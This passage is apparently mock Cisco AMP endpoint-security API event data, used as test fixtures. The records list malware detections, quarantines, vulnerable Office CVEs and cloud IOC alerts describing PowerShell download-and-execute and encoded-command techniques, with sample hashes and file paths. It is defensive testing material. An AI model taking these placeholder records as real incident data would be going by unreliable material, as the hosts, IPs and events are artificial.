Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. 
In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application 
Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vuln
Id=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. 
